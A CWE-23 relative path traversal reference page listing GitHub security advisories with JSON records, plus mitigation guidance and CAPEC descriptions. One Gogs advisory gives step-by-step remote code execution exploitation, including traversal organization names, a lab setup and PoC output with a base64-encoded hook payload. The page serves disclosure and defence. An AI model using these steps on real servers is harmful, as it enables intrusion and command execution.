CWE-23
AllowedRelative Path Traversal
Abstraction: Base · Status: Draft
The product uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize sequences such as ".." that can resolve to a location that is outside of that directory.
778 vulnerabilities reference this CWE, most recent first.
GHSA-9RXX-FF39-WWFV
Vulnerability from github – Published: 2024-06-26 06:30 – Updated: 2024-06-26 06:30Dell PowerProtect DD, versions prior to 8.0, LTS 7.13.1.0, LTS 7.10.1.30, LTS 7.7.5.40 on DDMC contain a relative path traversal vulnerability. A remote high privileged attacker could potentially exploit this vulnerability, leading to the application sending over an unauthorized file to the managed system.
{
"affected": [],
"aliases": [
"CVE-2024-37138"
],
"database_specific": {
"cwe_ids": [
"CWE-23"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-06-26T04:15:13Z",
"severity": "MODERATE"
},
"details": "Dell PowerProtect DD, versions prior to 8.0, LTS 7.13.1.0, LTS 7.10.1.30, LTS 7.7.5.40 on DDMC contain a relative path traversal vulnerability. A remote high privileged attacker could potentially exploit this vulnerability, leading to the application sending over an unauthorized file to the managed system.",
"id": "GHSA-9rxx-ff39-wwfv",
"modified": "2024-06-26T06:30:29Z",
"published": "2024-06-26T06:30:29Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-37138"
},
{
"type": "WEB",
"url": "https://www.dell.com/support/kbdoc/en-us/000226148/dsa-2024-219-dell-technologies-powerprotect-dd-security-update-for-multiple-security-vulnerabilities"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-9V62-QX4C-44X5
Vulnerability from github – Published: 2026-06-04 06:30 – Updated: 2026-07-14 19:50OpenStack Ironic through before 35.0.2 allows file overwrite via directory traversal during deployment with a crafted ISO image.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "ironic"
},
"ranges": [
{
"events": [
{
"introduced": "17.0.0"
},
{
"fixed": "26.1.7"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "ironic"
},
"ranges": [
{
"events": [
{
"introduced": "27.0.0"
},
{
"fixed": "29.0.6"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "ironic"
},
"ranges": [
{
"events": [
{
"introduced": "30.0.0"
},
{
"fixed": "32.0.2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "ironic"
},
"ranges": [
{
"events": [
{
"introduced": "33.0.0"
},
{
"fixed": "35.0.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-48681"
],
"database_specific": {
"cwe_ids": [
"CWE-23"
],
"github_reviewed": true,
"github_reviewed_at": "2026-07-14T19:50:43Z",
"nvd_published_at": "2026-06-04T04:17:15Z",
"severity": "MODERATE"
},
"details": "OpenStack Ironic through before 35.0.2 allows file overwrite via directory traversal during deployment with a crafted ISO image.",
"id": "GHSA-9v62-qx4c-44x5",
"modified": "2026-07-14T19:50:43Z",
"published": "2026-06-04T06:30:25Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-48681"
},
{
"type": "WEB",
"url": "https://bugs.launchpad.net/ironic/+bug/2148333"
},
{
"type": "PACKAGE",
"url": "https://github.com/openstack/ironic"
},
{
"type": "WEB",
"url": "https://www.openwall.com/lists/oss-security/2026/06/03/12"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2026/06/03/12"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "OpenStack Ironic allows file overwrite via directory traversal during deployment with a crafted ISO image"
}
GHSA-9W3C-478W-64GJ
Vulnerability from github – Published: 2026-05-29 12:31 – Updated: 2026-06-01 21:30Nozomi Networks Labs identified a CWE-23: Relative Path Traversal in the Administration WebUI in Waterfall WF-500 TX and RX Hosts in version 7.9.1.0 R2502171040 that allows remote unauthenticated attackers to delete arbitrary files on the Host machines.
{
"affected": [],
"aliases": [
"CVE-2025-41268"
],
"database_specific": {
"cwe_ids": [
"CWE-23"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-05-29T12:16:23Z",
"severity": "HIGH"
},
"details": "Nozomi Networks Labs identified a CWE-23: Relative Path Traversal in the Administration WebUI in Waterfall WF-500 TX and RX Hosts in version 7.9.1.0 R2502171040 that allows remote unauthenticated attackers to delete arbitrary files on the Host machines.",
"id": "GHSA-9w3c-478w-64gj",
"modified": "2026-06-01T21:30:41Z",
"published": "2026-05-29T12:31:25Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-41268"
},
{
"type": "WEB",
"url": "https://www.nozominetworks.com/labs/vulnerability-advisories-cve-2025-41268"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-9W72-2F23-57GM
Vulnerability from github – Published: 2022-10-01 00:00 – Updated: 2022-10-05 13:59DNN (GitHub repository dnnsoftware/dnn.platform) prior to 9.11.0 is vulnerable to Relative Path Traversal. Version 9.11.0 contains a patch for this issue.
{
"affected": [
{
"package": {
"ecosystem": "NuGet",
"name": "DotNetNuke.Core"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "9.11.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "NuGet",
"name": "DotNetNuke.Web"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "9.11.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2022-2922"
],
"database_specific": {
"cwe_ids": [
"CWE-22",
"CWE-23"
],
"github_reviewed": true,
"github_reviewed_at": "2022-10-03T22:21:19Z",
"nvd_published_at": "2022-09-30T07:15:00Z",
"severity": "MODERATE"
},
"details": "DNN (GitHub repository dnnsoftware/dnn.platform) prior to 9.11.0 is vulnerable to Relative Path Traversal. Version 9.11.0 contains a patch for this issue.",
"id": "GHSA-9w72-2f23-57gm",
"modified": "2022-10-05T13:59:42Z",
"published": "2022-10-01T00:00:25Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-2922"
},
{
"type": "WEB",
"url": "https://github.com/dnnsoftware/Dnn.Platform/commit/3697c5344cef8d49214230f0cc2efcd9e93a00a8"
},
{
"type": "WEB",
"url": "https://github.com/dnnsoftware/dnn.platform/commit/9b17351592fbde376506ba6705dbcc7a74a2a195"
},
{
"type": "PACKAGE",
"url": "https://github.com/dnnsoftware/dnn.platform"
},
{
"type": "WEB",
"url": "https://huntr.dev/bounties/74918f40-dc11-4218-abef-064eb71a0703"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "DNN vulnerable to Relative Path Traversal"
}
GHSA-C2QQ-2J48-5PR5
Vulnerability from github – Published: 2024-02-20 15:31 – Updated: 2024-02-20 15:31A relative path traversal in Fortinet FortiManager version 7.4.0 and 7.2.0 through 7.2.3 and 7.0.0 through 7.0.8 and 6.4.0 through 6.4.12 and 6.2.0 through 6.2.11 allows attacker to execute unauthorized code or commands via crafted HTTP requests.
{
"affected": [],
"aliases": [
"CVE-2023-42791"
],
"database_specific": {
"cwe_ids": [
"CWE-22",
"CWE-23"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-02-20T14:15:08Z",
"severity": "HIGH"
},
"details": "A relative path traversal in Fortinet FortiManager version 7.4.0 and 7.2.0 through 7.2.3 and 7.0.0 through 7.0.8 and 6.4.0 through 6.4.12 and 6.2.0 through 6.2.11 allows attacker to execute unauthorized code or commands via crafted HTTP requests.",
"id": "GHSA-c2qq-2j48-5pr5",
"modified": "2024-02-20T15:31:04Z",
"published": "2024-02-20T15:31:04Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-42791"
},
{
"type": "WEB",
"url": "https://fortiguard.com/psirt/FG-IR-23-189"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-C39W-43GM-34H5
Vulnerability from github – Published: 2026-06-23 17:10 – Updated: 2026-06-23 17:10Summary
Organization names containing path traversal sequences (../) are accepted by Gogs, and repositories under them are written to paths following these path traversals. This allows storing/retrieving data for repositories at arbitrary locations on the filesystem.
By creating nested structure of Git repositories, one can overwrite the other's hooks configuration to result in Remote Code Execution (RCE).
Details
During organization creation, internal/database/org.go calls os.MkdirAll(repox.UserPath(org.Name)) without sanitizing org.Name.
https://github.com/gogs/gogs/blob/d7571322a04a29476d4241406ed50bf7eef0a5b7/internal/database/org.go#L165
Repository creation uses this name to decide where to write the Git bare repository's (org/name.git). By setting the org name to ../../../../tmp/test, and creating a repository under that organization, it gets written under /tmp/test on the server.
https://github.com/gogs/gogs/blob/d7571322a04a29476d4241406ed50bf7eef0a5b7/internal/repox/repox.go#L57-L58
An attacker can abuse this in a clever way by writing to the /data/gogs/data/tmp/local-r/1 directory, being a local worktree of the git repositories inside of Gogs. These directories are editable by Git. By creating a repository nested inside of there, files like config and hooks/update are now referenced through the path traversal, and are editable by Git. This allows the attacker to edit the hooks/update script with malicious Bash commands and then to trigger the hook.
The steps to exploit this inside of Gogs are roughly (ignoring some syncing dummy actions):
- Create regular outer repository and get its ID
- Create organization named
../../../../data/gogs/data/tmp/local-r/{ID}/nested - Create a repository inside this organization (eg.
rce), which will be written into the local clone of the outer repository - From the outer repository, edit
nested/rce.git/hooks/updateto contain malicious shell commands - Interact with the
rcerepository again to trigger the updated hook, and RCE is achieved
PoC
- Set up a default Gogs instance by saving the following content to
docker-compose.ymland runningdocker compose up:
services:
db:
image: postgres:16-alpine
environment:
POSTGRES_USER: gogs
POSTGRES_PASSWORD: gogs
POSTGRES_DB: gogs
volumes:
- postgres-data:/var/lib/postgresql/data
restart: unless-stopped
healthcheck:
test: [ "CMD-SHELL", "pg_isready -U gogs -d gogs" ]
interval: 5s
timeout: 5s
retries: 5
gogs:
image: gogs/gogs
depends_on:
db:
condition: service_healthy
ports:
- "3000:3000"
volumes:
- gogs-data:/data
restart: unless-stopped
volumes:
gogs-data:
postgres-data:
- Visit http://localhost:3000, set the Host to
db:5432and Password togogs. Under Admin Account Settings configure your admin account - As the attacker, register an account with username
attackerand passwordattackerat http://localhost:3000/user/sign_up - As the attacker, run the following script (in gist to avoid cluttering this advisory):
https://gist.github.com/JorianWoltjer/4b72063338b27140f4439c524d98f2b9
The output should look like:
$ python3 gogs-rce.py
step 1 token ok
step 2 create personal repo 201 full_name attacker/writer-bd426045
step 3 web editor new file on attacker / writer-bd426045
step 4 GET writer repo -> local-r 1
step 5 create org 201 local-r 1 username ../../../../data/gogs/data/tmp/local-r/1/nested
step 6 get org 200 username ../../../../data/gogs/data/tmp/local-r/1/nested
step 7 create repo 201 full_name ../../../../data/gogs/data/tmp/local-r/1/nested/rce-b175aca7 html_url http://localhost:3000/../../../../data/gogs/data/tmp/local-r/1/nested/rce-b175aca7 clone_url http://localhost:3000/../../../../data/gogs/data/tmp/local-r/1/nested/rce-b175aca7.git
step 8 get repo 200 owner.username ../../../../data/gogs/data/tmp/local-r/1/nested full_name ../../../../data/gogs/data/tmp/local-r/1/nested/rce-b175aca7 empty False
Cloning into '/tmp/poc-writer-fy4k5064'...
remote: Enumerating objects: 6, done.
remote: Counting objects: 100% (6/6), done.
remote: Compressing objects: 100% (3/3), done.
remote: Total 6 (delta 0), reused 0 (delta 0), pack-reused 0 (from 0)
Unpacking objects: 100% (6/6), 491 bytes | 491.00 KiB/s, done.
step 9 clone writer repo -> /tmp/poc-writer-fy4k5064
[master 3cf84b2] poc: nested/rce-b175aca7.git hook path
1 file changed, 1 insertion(+)
create mode 100755 nested/rce-b175aca7.git/hooks/update
step 10 write nested/rce-b175aca7.git/hooks/update with echo 'aWQ=' | base64 -d | bash > pwned
Enumerating objects: 7, done.
Counting objects: 100% (7/7), done.
Delta compression using up to 14 threads
Compressing objects: 100% (2/2), done.
Writing objects: 100% (6/6), 1022 bytes | 1022.00 KiB/s, done.
Total 6 (delta 0), reused 0 (delta 0), pack-reused 0
To http://localhost:3000/attacker/writer-bd426045.git
b0b9886..3cf84b2 master -> master
step 11 push writer
step 12 API new file on attacker / writer-bd426045
step 13 API new file on org ../../../../data/gogs/data/tmp/local-r/1/nested / rce-b175aca7
step 14 API new file on attacker / writer-bd426045
step 15 GET raw pwned 200 http://localhost:3000/attacker/writer-bd426045/raw/master/nested/rce-b175aca7.git/pwned
=== COMMAND OUTPUT ===
uid=1000(git) gid=1000(git) groups=1000(git)
Impact
In the default setting, users can self-register and then create their own organizations. From here they can perform this exploit to achieve RCE as the git user.
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "gogs.io/gogs"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.14.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-52813"
],
"database_specific": {
"cwe_ids": [
"CWE-23"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-23T17:10:50Z",
"nvd_published_at": null,
"severity": "CRITICAL"
},
"details": "### Summary\n\nOrganization names containing path traversal sequences (`../`) are accepted by Gogs, and repositories under them are written to paths following these path traversals. This allows storing/retrieving data for repositories at arbitrary locations on the filesystem.\nBy creating nested structure of Git repositories, one can overwrite the other\u0027s `hooks` configuration to result in Remote Code Execution (RCE).\n\n### Details\n\nDuring organization creation, `internal/database/org.go` calls `os.MkdirAll(repox.UserPath(org.Name))` without sanitizing `org.Name`. \n\nhttps://github.com/gogs/gogs/blob/d7571322a04a29476d4241406ed50bf7eef0a5b7/internal/database/org.go#L165\n\nRepository creation uses this name to decide where to write the Git bare repository\u0027s (`org/name.git`). By setting the org name to `../../../../tmp/test`, and creating a repository under that organization, it gets written under `/tmp/test` on the server.\n\nhttps://github.com/gogs/gogs/blob/d7571322a04a29476d4241406ed50bf7eef0a5b7/internal/repox/repox.go#L57-L58\n\nAn attacker can abuse this in a clever way by writing to the `/data/gogs/data/tmp/local-r/1` directory, being a local worktree of the git repositories inside of Gogs. These directories are editable by Git. By creating a repository nested inside of there, files like `config` and `hooks/update` are now referenced through the path traversal, and are editable by Git. This allows the attacker to edit the `hooks/update` script with malicious Bash commands and then to trigger the hook.\n\nThe steps to exploit this inside of Gogs are roughly (ignoring some syncing dummy actions):\n\n1. Create regular outer repository and get its ID\n2. Create organization named `../../../../data/gogs/data/tmp/local-r/{ID}/nested`\n3. Create a repository inside this organization (eg. `rce`), which will be written into the local clone of the outer repository\n4. From the outer repository, edit `nested/rce.git/hooks/update` to contain malicious shell commands\n5. Interact with the `rce` repository again to trigger the updated hook, and RCE is achieved\n\n### PoC\n\n1. Set up a default Gogs instance by saving the following content to `docker-compose.yml` and running `docker compose up`:\n\n```yml\nservices:\n db:\n image: postgres:16-alpine\n environment:\n POSTGRES_USER: gogs\n POSTGRES_PASSWORD: gogs\n POSTGRES_DB: gogs\n volumes:\n - postgres-data:/var/lib/postgresql/data\n restart: unless-stopped\n healthcheck:\n test: [ \"CMD-SHELL\", \"pg_isready -U gogs -d gogs\" ]\n interval: 5s\n timeout: 5s\n retries: 5\n\n gogs:\n image: gogs/gogs\n depends_on:\n db:\n condition: service_healthy\n ports:\n - \"3000:3000\"\n volumes:\n - gogs-data:/data\n restart: unless-stopped\n\nvolumes:\n gogs-data:\n postgres-data:\n```\n\n2. Visit http://localhost:3000, set the *Host* to `db:5432` and *Password* to `gogs`. Under *Admin Account Settings* configure your admin account\n3. As the attacker, register an account with username `attacker` and password `attacker` at http://localhost:3000/user/sign_up\n4. As the attacker, run the following script (in gist to avoid cluttering this advisory):\n\nhttps://gist.github.com/JorianWoltjer/4b72063338b27140f4439c524d98f2b9\n\nThe output should look like:\n\n```shell\n$ python3 gogs-rce.py\nstep 1 token ok\nstep 2 create personal repo 201 full_name attacker/writer-bd426045\nstep 3 web editor new file on attacker / writer-bd426045\nstep 4 GET writer repo -\u003e local-r 1\nstep 5 create org 201 local-r 1 username ../../../../data/gogs/data/tmp/local-r/1/nested\nstep 6 get org 200 username ../../../../data/gogs/data/tmp/local-r/1/nested\nstep 7 create repo 201 full_name ../../../../data/gogs/data/tmp/local-r/1/nested/rce-b175aca7 html_url http://localhost:3000/../../../../data/gogs/data/tmp/local-r/1/nested/rce-b175aca7 clone_url http://localhost:3000/../../../../data/gogs/data/tmp/local-r/1/nested/rce-b175aca7.git\nstep 8 get repo 200 owner.username ../../../../data/gogs/data/tmp/local-r/1/nested full_name ../../../../data/gogs/data/tmp/local-r/1/nested/rce-b175aca7 empty False\nCloning into \u0027/tmp/poc-writer-fy4k5064\u0027...\nremote: Enumerating objects: 6, done.\nremote: Counting objects: 100% (6/6), done.\nremote: Compressing objects: 100% (3/3), done.\nremote: Total 6 (delta 0), reused 0 (delta 0), pack-reused 0 (from 0)\nUnpacking objects: 100% (6/6), 491 bytes | 491.00 KiB/s, done.\nstep 9 clone writer repo -\u003e /tmp/poc-writer-fy4k5064\n[master 3cf84b2] poc: nested/rce-b175aca7.git hook path\n 1 file changed, 1 insertion(+)\n create mode 100755 nested/rce-b175aca7.git/hooks/update\nstep 10 write nested/rce-b175aca7.git/hooks/update with echo \u0027aWQ=\u0027 | base64 -d | bash \u003e pwned\nEnumerating objects: 7, done.\nCounting objects: 100% (7/7), done.\nDelta compression using up to 14 threads\nCompressing objects: 100% (2/2), done.\nWriting objects: 100% (6/6), 1022 bytes | 1022.00 KiB/s, done.\nTotal 6 (delta 0), reused 0 (delta 0), pack-reused 0\nTo http://localhost:3000/attacker/writer-bd426045.git\n b0b9886..3cf84b2 master -\u003e master\nstep 11 push writer\nstep 12 API new file on attacker / writer-bd426045\nstep 13 API new file on org ../../../../data/gogs/data/tmp/local-r/1/nested / rce-b175aca7\nstep 14 API new file on attacker / writer-bd426045\nstep 15 GET raw pwned 200 http://localhost:3000/attacker/writer-bd426045/raw/master/nested/rce-b175aca7.git/pwned\n\n=== COMMAND OUTPUT ===\nuid=1000(git) gid=1000(git) groups=1000(git)\n```\n\n### Impact\n\nIn the default setting, users can self-register and then create their own organizations. From here they can perform this exploit to achieve RCE as the `git` user.",
"id": "GHSA-c39w-43gm-34h5",
"modified": "2026-06-23T17:10:50Z",
"published": "2026-06-23T17:10:50Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/gogs/gogs/security/advisories/GHSA-c39w-43gm-34h5"
},
{
"type": "WEB",
"url": "https://github.com/gogs/gogs/pull/8334"
},
{
"type": "WEB",
"url": "https://github.com/gogs/gogs/commit/f6acd467305943aae8403cbac81f0118dd1235d7"
},
{
"type": "PACKAGE",
"url": "https://github.com/gogs/gogs"
},
{
"type": "WEB",
"url": "https://github.com/gogs/gogs/releases/tag/v0.14.3"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Gogs has Path Traversal in organization name that results in RCE through Git hooks"
}
GHSA-C3FX-J4HR-97W5
Vulnerability from github – Published: 2026-05-08 21:31 – Updated: 2026-05-08 21:31Insufficient input validation of the feature file name in feature::LOADFEATUREFILE adminbin call can cause arbitrary file read when a relative file path is passed.
{
"affected": [],
"aliases": [
"CVE-2026-29201"
],
"database_specific": {
"cwe_ids": [
"CWE-20",
"CWE-23"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-05-08T19:16:29Z",
"severity": "MODERATE"
},
"details": "Insufficient input validation of the feature file name in `feature::LOADFEATUREFILE` adminbin call can cause arbitrary file read when a relative file path is passed.",
"id": "GHSA-c3fx-j4hr-97w5",
"modified": "2026-05-08T21:31:25Z",
"published": "2026-05-08T21:31:25Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29201"
},
{
"type": "WEB",
"url": "https://support.cpanel.net/hc/en-us/articles/40311033698327-Security-CVE-2026-29201-cPanel-WHM-WP2-Security-Update-May-08-2026"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-C3J4-8XV2-XWHP
Vulnerability from github – Published: 2025-11-14 06:31 – Updated: 2025-11-14 06:31IQ-Support developed by IQ Service International has an Arbitrary File Read vulnerability, allowing unauthenticated remote attackers to exploit Relative Path Traversal to download arbitrary system files.
{
"affected": [],
"aliases": [
"CVE-2025-13161"
],
"database_specific": {
"cwe_ids": [
"CWE-23"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-11-14T04:15:54Z",
"severity": "HIGH"
},
"details": "IQ-Support developed by IQ Service International has an Arbitrary File Read vulnerability, allowing unauthenticated remote attackers to exploit Relative Path Traversal to download arbitrary system files.",
"id": "GHSA-c3j4-8xv2-xwhp",
"modified": "2025-11-14T06:31:16Z",
"published": "2025-11-14T06:31:16Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13161"
},
{
"type": "WEB",
"url": "https://www.twcert.org.tw/en/cp-139-10502-11c6d-2.html"
},
{
"type": "WEB",
"url": "https://www.twcert.org.tw/tw/cp-132-10501-a25a6-1.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-C3PR-284F-8X9F
Vulnerability from github – Published: 2025-05-14 12:31 – Updated: 2026-04-01 18:35Relative Path Traversal vulnerability in Themewinter Eventin allows Path Traversal.This issue affects Eventin: from n/a through 4.0.26.
{
"affected": [],
"aliases": [
"CVE-2025-47445"
],
"database_specific": {
"cwe_ids": [
"CWE-23"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-05-14T12:15:19Z",
"severity": "HIGH"
},
"details": "Relative Path Traversal vulnerability in Themewinter Eventin allows Path Traversal.This issue affects Eventin: from n/a through 4.0.26.",
"id": "GHSA-c3pr-284f-8x9f",
"modified": "2026-04-01T18:35:05Z",
"published": "2025-05-14T12:31:12Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-47445"
},
{
"type": "WEB",
"url": "https://patchstack.com/database/wordpress/plugin/wp-event-solution/vulnerability/wordpress-eventin-4-0-26-arbitrary-file-download-vulnerability?_s_id=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-CC6P-PMXF-H4WH
Vulnerability from github – Published: 2025-11-07 18:30 – Updated: 2025-11-17 18:30A relative path traversal vulnerability has been reported to affect Download Station. If a remote attacker gains an administrator account, they can then exploit the vulnerability to read the contents of unexpected files or system data.
We have already fixed the vulnerability in the following versions: Download Station 5.10.0.305 ( 2025/09/16 ) and later Download Station 5.10.0.304 ( 2025/09/08 ) and later
{
"affected": [],
"aliases": [
"CVE-2025-58463"
],
"database_specific": {
"cwe_ids": [
"CWE-23"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-11-07T16:15:40Z",
"severity": "LOW"
},
"details": "A relative path traversal vulnerability has been reported to affect Download Station. If a remote attacker gains an administrator account, they can then exploit the vulnerability to read the contents of unexpected files or system data.\n\nWe have already fixed the vulnerability in the following versions:\nDownload Station 5.10.0.305 ( 2025/09/16 ) and later\nDownload Station 5.10.0.304 ( 2025/09/08 ) and later",
"id": "GHSA-cc6p-pmxf-h4wh",
"modified": "2025-11-17T18:30:26Z",
"published": "2025-11-07T18:30:30Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58463"
},
{
"type": "WEB",
"url": "https://www.qnap.com/en/security-advisory/qsa-25-37"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:N/VA:N/SC:H/SI:H/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
Mitigation MIT-5.1
Strategy: Input Validation
- Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.
- When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."
- Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
- When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single "." character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as "/" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434.
- Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering "/" is insufficient protection if the filesystem also supports the use of "\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if "../" sequences are removed from the ".../...//" string in a sequential fashion, two instances of "../" would be removed from the original string, but the remaining characters would still form the "../" string.
Mitigation MIT-20.1
Strategy: Input Validation
- Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked.
- Use a built-in path canonicalization function (such as realpath() in C) that produces the canonical version of the pathname, which effectively removes ".." sequences and symbolic links (CWE-23, CWE-59). This includes:
- realpath() in C
- getCanonicalPath() in Java
- GetFullPath() in ASP.NET
- realpath() or abs_path() in Perl
- realpath() in PHP
Mitigation MIT-29
Strategy: Firewall
Use an application firewall that can detect attacks against this weakness. It can be beneficial in cases in which the code cannot be fixed (because it is controlled by a third party), as an emergency prevention measure while more comprehensive software assurance measures are applied, or to provide defense in depth [REF-1481].
CAPEC-139: Relative Path Traversal
An attacker exploits a weakness in input validation on the target by supplying a specially constructed path utilizing dot and slash characters for the purpose of obtaining access to arbitrary files or resources. An attacker modifies a known path on the target in order to reach material that is not available through intended channels. These attacks normally involve adding additional path separators (/ or \) and/or dots (.), or encodings thereof, in various combinations in order to reach parent directories or entirely separate trees of the target's directory structure.
CAPEC-76: Manipulating Web Input to File System Calls
An attacker manipulates inputs to the target software which the target software passes to file system calls in the OS. The goal is to gain access to, and perhaps modify, areas of the file system that the target software did not intend to be accessible.